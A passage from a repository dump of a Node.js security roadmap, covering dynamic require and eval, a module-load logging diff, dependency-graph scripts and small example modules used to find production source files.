100 |         return codeThatEvals();
101 |       }
102 |     }
103 | 
104 |     const countBefore = _EVALABLE_SOURCES.get(sourceToEval) || 0;
105 |     _EVALABLE_SOURCES.set(sourceToEval, countBefore + 1);
106 |     try {
107 |       return codeThatEvals();
108 |     } finally {
109 |       if (countBefore) {
110 |         _EVALABLE_SOURCES.set(sourceToEval, countBefore);
111 |       } else {
112 |         _EVALABLE_SOURCES.delete(sourceToEval);
113 |       }
114 |     }
115 |   };
116 | })();
117 | ```
118 | 
119 | and the `eval` operators would check that their argument is in the global
120 | set.
121 | 
122 | Implicit access to `eval` is possible because reflective operators can
123 | reach `eval`.  As long as we can prevent reflective access to
124 | `evalPermissions` we can constrain what can be `eval`ed.  If
125 | `evalPermission` is a function parameter, then only `arguments`
126 | aliases it, so functions that do not mention the special name
127 | `arguments` may safely receive one.  Most functions do not mention
128 | `arguments`.  Before whitelisting a module, a reviewer would be wise
129 | to check for any use of `arguments`, and for any escape of permissions
130 | or `module`.
131 | 
132 | `evalPermission` is an opaque token &mdash; only its reference identity
133 | is significant, so we can check membership in a `WeakSet` without
134 | risk of forgery.
135 | 
136 | This requires API changes to existing modules that dynamically use
137 | `eval`, but the changes should be additive and straightforward.
138 | 
139 | It also allows project teams and security specialists to decide on
140 | a case-by-case basis, which modules really need dynamic `eval`.
141 | 
142 | As with synthetic modules, frozen realms may provide a way to further
143 | restrict what dynamically loaded code can do.  If you're trying to
144 | decide whether to trust a module that dynamically loads code, you have
145 | more ways to justifiably conclude that it's safe if the module loads
146 | into a sandbox restricts to a limited frozen API.
147 | 
148 | [CodeGeneration callbacks]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=626
149 | [CSP callback]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=352
150 | 


--------------------------------------------------------------------------------
/chapter-2/bundling.md:
--------------------------------------------------------------------------------
  1 | # Dynamic Bundling
  2 | 
  3 | Consider a simple Node application:
  4 | 
  5 | ```js
  6 | // index.js
  7 | // Example that uses various require(...) use cases.
  8 | 
  9 | let staticLoad = require('./lib/static');
 10 | function dynamicLoad(f, x) {
 11 |   return f('./lib/' + x);
 12 | }
 13 | dynamicLoad(require, Math.random() < 2 ? 'dynamic' : 'bogus');
 14 | exports.lazyLoad = () => require('./lib/lazy');
 15 | 
 16 | // Fallback to alternatives
 17 | require(['./lib/opt1', './lib/opt2'].find(
 18 |     (name) => {
 19 |       try {
 20 |         require.resolve(name);
 21 |         return true;
 22 |       } catch (_) {
 23 |         return false;
 24 |       }
 25 |     }));
 26 | ```
 27 | 
 28 | with some unit tests:
 29 | 
 30 | ```js
 31 | // test/test.js
 32 | 
 33 | var expect = require("chai").expect;
 34 | var app = require("../index");
 35 | 
 36 | describe("My TestSuite", () => {
 37 |   describe("A test", () => {
 38 |     it("A unittest", () => {
 39 |       // Exercise the API
 40 |       app.lazyLoad();
 41 |     });
 42 |   });
 43 | });
 44 | ```
 45 | 
 46 | We hack `updateChildren`, which gets called by `Module._load` for new
 47 | modules and when a module requires a cached module, to dump information
 48 | about loads:
 49 | 
 50 | ```diff
 51 | diff --git a/lib/module.js b/lib/module.js
 52 | index cc8d5097bb..945ab8a4a8 100644
 53 | --- a/lib/module.js
 54 | +++ b/lib/module.js
 55 | @@ -59,8 +59,18 @@ stat.cache = null;
 56 | 
 57 |  function updateChildren(parent, child, scan) {
 58 |    var children = parent && parent.children;
 59 | -  if (children && !(scan && children.includes(child)))
 60 | +  if (children && !(scan && children.includes(child))) {
 61 | +    if (parent.filename && child.id) {
 62 | +      // HACK: rather than require('fs') to write a file out, we
 63 | +      // log to the console.
 64 | +      // We assume the prefix will be removed and the result wrapped in
 65 | +      // a DOT digraph.
 66 | +      console.log(
 67 | +          'REQUIRE_LOG_DOT:    ' + JSON.stringify(parent.filename)
 68 | +          + ' -> ' + JSON.stringify(child.id) + ';');
 69 | +    }
 70 |      children.push(child);
 71 | +  }
 72 |  }
 73 | ```
 74 | 
 75 | Running the tests and extracting the graph ([code][extract-script])
 76 | gives us a rather [hairy dependency graph](example/graphs/full.svg):
 77 | 
 78 | <img title="Files loaded by `npm test`" src="example/graphs/full.svg" width=800 height=100>
 79 | 
 80 | We add an edge from `"./package.json"` to the module's main file.
 81 | Then we filter edges ([code][graph-filter]) to include only those
 82 | reachable from `"./package.json"`.  This lets us distinguish files
 83 | loaded by the test runner and tests from those loaded after control
 84 | has entered an API in a production file.
 85 | 
 86 | The resulting graph is much simpler:
 87 | 
 88 | ![Production Source Files](example/graphs/filtered.svg)
 89 | 
 90 | Note that the production file list includes dynamically and lazily
 91 | loaded files.  It does include `./lib/opt2.js` but not `./lib/opt1.js`.
 92 | The former file does not exist, so the loop which picks the first
 93 | available alternative tries and finds the latter.
 94 | 
 95 | Our production source list should include all the files we need
 96 | in production if
 97 | 
 98 | *  The unit tests `require` the main file
 99 | *  The unit tests have enough coverage to load all modules required
100 |    in production via APIs defined in the main file or in APIs
101 |    transitively loaded from there.
102 | 
103 | It is definitely possible to miss some files.  If the unit test did
104 | not call `app.lazyLoad` then there would be no edge to
105 | `./lib/lazy.js`.  To address this, developers can
106 | 
107 | *  Expand test coverage to exercise code paths that load the
108 |    missing source files.
109 | *  Or add an explicit whitelist like
110 |    ```js
111 |    // production-source-whitelist.js
112 |    require('./index.js');
113 |    require('./lib/lazy.js');
114 |    ```
115 |    and explicitly pass this as the main file to the filter
116 |    instead of defaulting to the one specified in `package.json`.
117 | 
118 | Dynamic analysis is not perfect, but a missing source file is
119 | readily apparent, so this replaces
120 | 
121 | *  hard-to-detect bugs with potentially severe security consequences,
122 | 
123 | with
124 | 
125 | *  easy-to-detect bugs with negligible security consequences.
126 | 
127 | [extract-script]: https://github.com/google/node-sec-roadmap/blob/master/chapter-2/example/make_dep_graph.sh
128 | [graph-filter]: https://github.com/google/node-sec-roadmap/blob/6130b76446ff4efbb276d8128c12e41ea2fffbc9/chapter-2/example/make_dep_graph.sh#L39-L73
129 | 


--------------------------------------------------------------------------------
/chapter-2/dynamism.md:
--------------------------------------------------------------------------------
  1 | # Dynamism when you need it
  2 | 
  3 | ## Background
  4 | 
  5 | Node.js code is composed of CommonJS modules that are linked together
  6 | by the builtin `require` function, or [`import`][import-js] statements
  7 | (used by [TypeScript][import-ts]) that typically transpile to
  8 | `require` (modulo [experimental features][esm]).
  9 | 
 10 | `require` itself calls `Module._load` ([code][Module._load]) to
 11 | resolve and load code.  ["The Node.js Way"][FKS] explains this flow
 12 | well.
 13 | 
 14 | Unlike `import`, `require` is dynamic: a runtime value can specify the
 15 | name of a module to load.  (The EcmaScript committee is considering a
 16 | [dynamic `import` operator][import-op-strawman], but we have
 17 | not included that in this analysis.)
 18 | 
 19 | 
 20 | This dynamism is powerful and flexible and enables varied use cases
 21 | like the following:
 22 | 
 23 | *   Lazy loading.  Waiting to load a dependency until it is definitely needed.
 24 |     ```js
 25 |     const infrequentlyUsedAPI = (function () {
 26 |       const dependency = require('dependency');
 27 |       return function infrequentlyUsedAPI() {
 28 |         // Use dependency
 29 |       };
 30 |     }());
 31 |     ```
 32 | *   Loading plugins based on a configuration object.
 33 |     ```js
 34 |     function Service(config) {
 35 |       (config.plugins || []).forEach(
 36 |           (pluginName) => {
 37 |             require(pluginName).initPlugin(this);
 38 |           });
 39 |     }
 40 |     ```
 41 | *   Falling back to an alternate service provider if the first choice
 42 |     isn't available:
 43 |     ```js
 44 |     const KNOWN_SERVICE_PROVIDERS = ['foo-widget', 'bar-widget'];
 45 |     const serviceProviderName = KNOWN_SERVICE_PROVIDERS.find(
 46 |        (name) => {
 47 |          try {
 48 |            require.resolve(name);
 49 |            return true;
 50 |          } catch (_) {
 51 |            return false;
 52 |          }
 53 |        });
 54 |     const serviceProvider = require(serviceProviderName);
 55 |     ```
 56 | *   Taking advantage of an optional dependency when it is available.
 57 |     ```js
 58 |     let optionalDependency = null;
 59 |     try {
 60 |       optionalDependency = require('optionalDependency');
 61 |     } catch (_) {
 62 |       // Oh well.
 63 |     }
 64 |     ```
 65 | *   Loading a handler for a runtime value based on a naming convention.
 66 |     ```js
 67 |     function handle(request) {
 68 |       const handlerName = request.type + '-handler';  // Documented convention
 69 |       let handler;
 70 |       try {
 71 |         handler = require(handlerName);
 72 |       } catch (e) {
 73 |         throw new Error(
 74 |             'Expected handler ' + handlerName
 75 |             + ' for requests with type ' + request.type);
 76 |       }
 77 |       return handler.handle(request);
 78 |     }
 79 |     ```
 80 | *   Introspecting over module metadata.
 81 |     ```js
 82 |     const version = require('./package.json').version;
 83 |     ```
 84 | 
 85 | During rapid development, [file-system monitors][nodemon] can restart
 86 | a node project when source files change, and the application stitches
 87 | itself together without the complex compiler and build system
 88 | integration that statically compiled languages use to do incremental
 89 | recompilation.
 90 | 
 91 | 
 92 | ## Problem
 93 | 
 94 | Threats: [DEX][] [RCE][] [UIR][]
 95 | 
 96 | The `node_modules` directory does not keep production code separate
 97 | from test code.  If test code can be `require`d in production, then
 98 | an attacker may find it far easier to execute a wide variety of other
 99 | attacks.  See [UIR][] for more details on this.
100 | 
101 | Node applications rely on dynamic uses of `require` and changes that
102 | break any of these use cases would require coordinating large scale
103 | changes to existing code, tools, and development practices threatening
104 | [developer experience][DEX].
105 | 
106 | Requiring developers to pick and choose which source files are
107 | production and which are test would either:
108 | 
109 | *  Require them to scrutinize source files not only for their project
110 |    but also for deep dependencies with which they are unfamiliar
111 |    leading to poor developer experience.
112 | *  Whitelist without scrutiny leading to the original security problem.
113 | *  Lead them to not use available modules to solve problems and instead
114 |    roll their own leading to poor developer experience, and possibly
115 |    [LQC][] problems.
116 | 
117 | We need to ensure that only source code written with production
118 | constraints in mind loads in production without increasing the burden
119 | on developers.
120 | 
121 | When the behavior of code in production is markedly different from that
122 | on a developer's workstation, developers lose confidence that they
123 | can avoid bugs in production by testing locally which may lead
124 | to poor developer experience and lower quality code.
125 | 
126 | 
127 | ## Success Criteria
128 | 
129 | We would have prevented abuse of `require` if:
130 | 
131 | *  Untrusted inputs could not cause `require` to load a
132 |    non-production source file,
133 | *  and/or no non-production source files are reachable by
134 |    `require`,
135 | *  and/or loading a non-production source file has no adverse effect.
136 | 
137 | We would have successfully prevented abuse of `eval`, `new Function`
138 | and related operators if:
139 | 
140 | *  Untrusted inputs cannot reach an `eval` operator,
141 | *  and/or untrusted inputs that reach them cause no adverse affects,
142 | *  and/or security specialists could whitelist uses of `eval` operators
143 |    that are necessary for the functioning of the larger
144 |    system and compatible with the system's security goals.
145 | 
146 | In both cases, converting dynamic operators to static before untrusted
147 | inputs reach the system reduces the attack surface.  Requiring
148 | large-scale changes to existing npm modules or requiring large scale
149 | rewrites of code that uses using them constitutes compromises [DEX][].
150 | 
151 | 
152 | ## Current practices
153 | 
154 | Some development teams use [webpack][] or similar tools to statically
155 | bundle server-side modules, and provide flexible transpilation
156 | pipelines.  That's a great way to do things, but solving security
157 | problems only for teams with development practices mature enough to
158 | deploy via webpack risks preaching to the choir.
159 | 
160 | Webpack, in its minimal configuration, does not attempt to skip
161 | test files ([code][webpack-experiment]).
162 | Teams with an experienced webpack user can use it to great effect, but
163 | it is not an out-of-the-box solution.
164 | 
165 | Webpacking does not prevent calls to `require(...)` with unintended
166 | arguments, but greatly reduces the chance that they will load
167 | non-production code.  As long as the server process cannot read
168 | JS files other than those in the bundle, then a webpacked server
169 | is safe from [UIR][].  This may not be the case if the production
170 | machine has npm modules globally installed, and the server process
171 | is not running in a [chroot jail][].
172 | 
173 | 
174 | ## A Possible Solution
175 | 
176 | We present one possible solution to demonstrate that tackling this
177 | problem is feasible.
178 | 
179 | If we can compute the entire set of `require`-able sources when
180 | dealing only with inputs from trusted sources, then we can
181 | ensure that the node runtime only loads those sources even when
182 | exposed to untrusted inputs.
183 | 
184 | We propose these changes:
185 | 
186 | *  A two phase approach to prevent abuse of `require`.
187 |    1. Tweaks to the node module loader that make it easy to
188 |       [dynamically bundle](bundling.md) a release candidate.
189 |    2. Tweaks to the node module loader in production to restrict
190 |       code loads based on [source content hashes](source-contents.md)
191 |       from the bundling phase.
192 | *  Two different strategies for preventing abuse of
193 |    [`eval`](what-about-eval.md).
194 |    *  JavaScript idioms that can allow many uses of `eval` to
195 |       [load as modules](synthetic-modules.md) and to bundle as above.
196 |    *  Using JavaScript engine callbacks to
197 |       [allow uses of `eval`](bounded-eval.md) by approved modules.
198 | 
199 | [DEX]: ../chapter-1/threat-DEX.md
200 | [LQC]: ../chapter-1/threat-LQC.md
201 | [RCE]: ../chapter-1/threat-RCE.md
202 | [UIR]: ../chapter-1/threat-UIR.md
203 | [webpack]: https://webpack.js.org/
204 | [Symbol]: (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol)
205 | [import-js]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import
206 | [import-ts]: https://www.typescriptlang.org/docs/handbook/modules.html#import
207 | [Module._load]: https://github.com/nodejs/node/blob/0fdd88a374e23e1dd4a05d93afd5eb0c3b080fd5/lib/module.js#L449
208 | [FKS]: http://fredkschott.com/post/2014/06/require-and-the-module-system/
209 | [esm]: https://nodejs.org/api/esm.html#esm_ecmascript_modules
210 | [nodemon]: https://nodemon.io/
211 | [import-op-strawman]: https://github.com/tc39/proposal-dynamic-import
212 | [chroot jail]: https://help.ubuntu.com/community/BasicChroot
213 | [webpack-experiment]: https://github.com/google/node-sec-roadmap/tree/master/chapter-2/experiments/webpack-compat
214 | 


--------------------------------------------------------------------------------
/chapter-2/example/.gitignore:
--------------------------------------------------------------------------------
1 | node_modules
2 | 


--------------------------------------------------------------------------------
/chapter-2/example/graphs/filtered.dot:
--------------------------------------------------------------------------------
1 | digraph Modules {
2 |     "./package.json" [fillcolor=black,fontcolor=white,style=filled];
3 |     "./index.js" -> "./lib/static.js";
4 |     "./index.js" -> "./lib/dynamic.js";
5 |     "./index.js" -> "./lib/opt2.js";
6 |     "./index.js" -> "./lib/lazy.js";
7 |     "./package.json" -> "./index.js";
8 | }
9 | 


--------------------------------------------------------------------------------
/chapter-2/example/graphs/filtered.svg:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 2 | <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
 3 |  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 4 | <!-- Generated by graphviz version 2.40.1 (20161225.0304)
 5 |  -->
 6 | <!-- Title: Modules Pages: 1 -->
 7 | <svg width="422pt" height="188pt"
 8 |  viewBox="0.00 0.00 422.14 188.00" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
 9 | <g id="graph0" class="graph" transform="scale(1 1) rotate(0) translate(4 184)">
10 | <title>Modules</title>
11 | <polygon fill="#ffffff" stroke="transparent" points="-4,4 -4,-184 418.1424,-184 418.1424,4 -4,4"/>
12 | <!-- ./package.json -->
13 | <g id="node1" class="node">
14 | <title>./package.json</title>
15 | <ellipse fill="#000000" stroke="#000000" cx="215.1961" cy="-162" rx="50.0912" ry="18"/>
16 | <text text-anchor="middle" x="215.1961" y="-158.3" font-family="Times,serif" font-size="14.00" fill="#ffffff">./package.json</text>
17 | </g>
18 | <!-- ./index.js -->
19 | <g id="node2" class="node">
20 | <title>./index.js</title>
21 | <ellipse fill="none" stroke="#000000" cx="215.1961" cy="-90" rx="35.9954" ry="18"/>
22 | <text text-anchor="middle" x="215.1961" y="-86.3" font-family="Times,serif" font-size="14.00" fill="#000000">./index.js</text>
23 | </g>
24 | <!-- ./package.json&#45;&gt;./index.js -->
25 | <g id="edge5" class="edge">
26 | <title>./package.json&#45;&gt;./index.js</title>
27 | <path fill="none" stroke="#000000" d="M215.1961,-143.8314C215.1961,-136.131 215.1961,-126.9743 215.1961,-118.4166"/>
28 | <polygon fill="#000000" stroke="#000000" points="218.6962,-118.4132 215.1961,-108.4133 211.6962,-118.4133 218.6962,-118.4132"/>
29 | </g>
30 | <!-- ./lib/static.js -->
31 | <g id="node3" class="node">
32 | <title>./lib/static.js</title>
33 | <ellipse fill="none" stroke="#000000" cx="44.1961" cy="-18" rx="44.393" ry="18"/>
34 | <text text-anchor="middle" x="44.1961" y="-14.3" font-family="Times,serif" font-size="14.00" fill="#000000">./lib/static.js</text>
35 | </g>
36 | <!-- ./index.js&#45;&gt;./lib/static.js -->
37 | <g id="edge1" class="edge">
38 | <title>./index.js&#45;&gt;./lib/static.js</title>
39 | <path fill="none" stroke="#000000" d="M187.722,-78.432C159.8298,-66.6879 116.3384,-48.3757 84.537,-34.9857"/>
40 | <polygon fill="#000000" stroke="#000000" points="85.6477,-31.6558 75.0731,-31.0009 82.9313,-38.1072 85.6477,-31.6558"/>
41 | </g>
42 | <!-- ./lib/dynamic.js -->
43 | <g id="node4" class="node">
44 | <title>./lib/dynamic.js</title>
45 | <ellipse fill="none" stroke="#000000" cx="159.1961" cy="-18" rx="53.0913" ry="18"/>
46 | <text text-anchor="middle" x="159.1961" y="-14.3" font-family="Times,serif" font-size="14.00" fill="#000000">./lib/dynamic.js</text>
47 | </g>
48 | <!-- ./index.js&#45;&gt;./lib/dynamic.js -->
49 | <g id="edge2" class="edge">
50 | <title>./index.js&#45;&gt;./lib/dynamic.js</title>
51 | <path fill="none" stroke="#000000" d="M201.9249,-72.937C195.1206,-64.1886 186.694,-53.3545 179.1271,-43.6256"/>
52 | <polygon fill="#000000" stroke="#000000" points="181.6632,-41.1854 172.761,-35.4407 176.1378,-45.483 181.6632,-41.1854"/>
53 | </g>
54 | <!-- ./lib/opt2.js -->
55 | <g id="node5" class="node">
56 | <title>./lib/opt2.js</title>
57 | <ellipse fill="none" stroke="#000000" cx="272.1961" cy="-18" rx="41.6928" ry="18"/>
58 | <text text-anchor="middle" x="272.1961" y="-14.3" font-family="Times,serif" font-size="14.00" fill="#000000">./lib/opt2.js</text>
59 | </g>
60 | <!-- ./index.js&#45;&gt;./lib/opt2.js -->
61 | <g id="edge3" class="edge">
62 | <title>./index.js&#45;&gt;./lib/opt2.js</title>
63 | <path fill="none" stroke="#000000" d="M228.7043,-72.937C235.7,-64.1003 244.3806,-53.1354 252.1423,-43.3311"/>
64 | <polygon fill="#000000" stroke="#000000" points="254.926,-45.4536 258.3889,-35.4407 249.4376,-41.1087 254.926,-45.4536"/>
65 | </g>
66 | <!-- ./lib/lazy.js -->
67 | <g id="node6" class="node">
68 | <title>./lib/lazy.js</title>
69 | <ellipse fill="none" stroke="#000000" cx="373.1961" cy="-18" rx="40.8928" ry="18"/>
70 | <text text-anchor="middle" x="373.1961" y="-14.3" font-family="Times,serif" font-size="14.00" fill="#000000">./lib/lazy.js</text>
71 | </g>
72 | <!-- ./index.js&#45;&gt;./lib/lazy.js -->
73 | <g id="edge4" class="edge">
74 | <title>./index.js&#45;&gt;./lib/lazy.js</title>
75 | <path fill="none" stroke="#000000" d="M241.9986,-77.7862C267.6274,-66.1072 306.5225,-48.3829 335.3146,-35.2624"/>
76 | <polygon fill="#000000" stroke="#000000" points="337.0095,-38.3364 344.6578,-31.0048 334.1067,-31.9666 337.0095,-38.3364"/>
77 | </g>
78 | </g>
79 | </svg>
80 | 


--------------------------------------------------------------------------------
/chapter-2/example/index.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | // index.js
19 | // Example that tests various kinds of loads.
20 | 
21 | let staticLoad = require('./lib/static');
22 | function dynamicLoad(f, x) {
23 |   return f('./lib/' + x);
24 | }
25 | dynamicLoad(require, Math.random() < 2 ? 'dynamic' : 'bogus');
26 | exports.lazyLoad = () => require('./lib/lazy');
27 | 
28 | // Fallback to alternatives
29 | require(['./lib/opt1', './lib/opt2'].find(
30 |     (name) => {
31 |       try {
32 |         require.resolve(name);
33 |         return true;
34 |       } catch (_) {
35 |         return false;
36 |       }
37 |     }));
38 | 


--------------------------------------------------------------------------------
/chapter-2/example/lib/dynamic.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | // lib/dynamic.js
19 | 
20 | exports.x = 'dynamic';
21 | 


--------------------------------------------------------------------------------
/chapter-2/example/lib/lazy.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | // lib/lazy.js
19 | 
20 | exports.x = 'lazy';
21 | 


--------------------------------------------------------------------------------
/chapter-2/example/lib/opt2.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | // lib/opt2.js
19 | 
20 | exports.x = 'opt2';
21 | 


--------------------------------------------------------------------------------
/chapter-2/example/lib/static.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | // lib/static.js
19 | 
20 | exports.x = 'static';
21 | 


--------------------------------------------------------------------------------
/chapter-2/example/make_dep_graph.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Copyright 2017 Google LLC
 4 | #
 5 | # Licensed under the Apache License, Version 2.0 (the "License");
 6 | # you may not use this file except in compliance with the License.
 7 | # You may obtain a copy of the License at
 8 | #
 9 | #     https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 | 
17 | set -e
18 | 
19 | cd "$(dirname "$0")"
20 | 
21 | mkdir -p graphs
22 | (
23 |     echo 'digraph Modules {'
24 | 
25 |     # Run the tests and filter the logs for log entries from our
26 |     # hacked Module._load.
27 |     # Also relativize source file paths.
28 |     NODE=/Users/msamuel/work/node/out/Release/node \
29 |     PATH="/Users/msamuel/work/node/out/Release/:$PATH" \
30 |     ./node_modules/.bin/mocha 2>&1 \
31 |     | perl -ne 's/"$ENV{PWD}/"./g; if (s/^REQUIRE_LOG_DOT://) { print $_; } else { print STDERR $_; }'
32 | 
33 |     # Add an edge from package.json to the main module.
34 |     echo '    "./package.json" -> "./index.js";'
35 |     echo '    "./package.json" [fillcolor=black,fontcolor=white,style=filled];'
36 |     echo '}'
37 | ) > graphs/full.dot
38 | 
39 | python -c '
40 | import re
41 | import sys
42 | 
43 | EDGE_RE = re.compile(r"""^ *(\"(?:[^\"\\]|\\.)*\") -> (\"(?:[^\"\\]|\\.)*\");$""")
44 | GRAPH_END_RE = re.compile(r"^ *\}")
45 | 
46 | edges = {}
47 | def add_edge(src, tgt):
48 |   tgts = edges.get(src)
49 |   if tgts is None:
50 |     tgts = []
51 |     edges[src] = tgts
52 |   tgts.append(tgt)
53 | 
54 | for line in sys.stdin:
55 |   edges_match = EDGE_RE.match(line)
56 |   if edges_match is not None:
57 |     add_edge(edges_match.group(1), edges_match.group(2))
58 |     continue
59 |   elif GRAPH_END_RE.match(line):
60 |     reachable = set()
61 |     def find_reachable(src):
62 |       if src not in reachable:
63 |         reachable.add(src)
64 |         for tgt in edges.get(src, ()):
65 |           find_reachable(tgt)
66 |     find_reachable("\"./package.json\"")
67 |     reachable = list(reachable)
68 |     reachable.sort()
69 |     for src in reachable:
70 |       for tgt in edges.get(src, ()):
71 |         print "    %s -> %s;" % (src, tgt)
72 |   print line,
73 | ' < graphs/full.dot > graphs/filtered.dot
74 | 
75 | for graph in full filtered; do
76 |     dot -Tsvg graphs/"$graph".dot > graphs/"$graph".svg
77 | done
78 | 
79 | # Start walking from package.json
80 | 
81 | 


--------------------------------------------------------------------------------
/chapter-2/example/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "name": "dynamism-example",
 3 |     "private": true,
 4 |     "description": "Example code that shows dynamically walking the test graph",
 5 |     "main": "index.js",
 6 |     "scripts": {
 7 |         "test": "echo $NODE; ./node_modules/.bin/mocha"
 8 |     },
 9 |     "author": "Mike Samuel",
10 |     "license": "Apache-2.0",
11 |     "devDependencies": {
12 |         "chai": ">=4.1.2",
13 |         "mocha": ">=4.0.1"
14 |     }
15 | }
16 | 


--------------------------------------------------------------------------------
/chapter-2/example/test/test.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | // test/test.js
19 | 
20 | var expect = require("chai").expect;
21 | var app = require("../index");
22 | 
23 | describe("My TestSuite", () => {
24 |   describe("A test", () => {
25 |     it("A unittest", () => {
26 |       // Exercise the API
27 |       app.lazyLoad();
28 |     });
29 |   });
30 | });
31 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/.gitignore:
--------------------------------------------------------------------------------
1 | dist
2 | node_modules


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/goodbye.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | exports.say = x => console.log(`Goodbye, ${x}!`);
19 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/hello.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | exports.say = x => console.log(`Hello, ${x}!`);
19 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/index.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
